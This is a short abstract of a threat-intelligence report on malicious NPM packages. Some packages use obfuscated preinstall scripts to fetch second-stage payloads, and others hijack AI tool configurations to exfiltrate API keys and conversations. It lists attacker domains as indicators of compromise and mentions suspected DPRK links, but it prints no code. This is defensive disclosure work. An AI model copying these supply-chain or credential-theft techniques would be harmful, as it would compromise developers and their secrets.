Hunting Malicious NPM Packages with AI

This report details a series of malicious NPM packages discovered by a custom scanner that use obfuscated JavaScript and preinstall scripts to spawn child processes and fetch second-stage payloads (e.g., from d38u852ncr1ov2.cloudfront.net), as well as packages that hijack AI tool configurations to proxy and exfiltrate API keys and conversations (e.g., heibai.natapp1.cc). It provides decoded code snippets, attacker infrastructure and IOCs (packages, domains, a SHA-256 binary hash), notes suspected DPRK linkage for some activity, and highlights credential harvesting and persistence behaviors—constituting an active supply-chain and credential-exfiltration threat vector.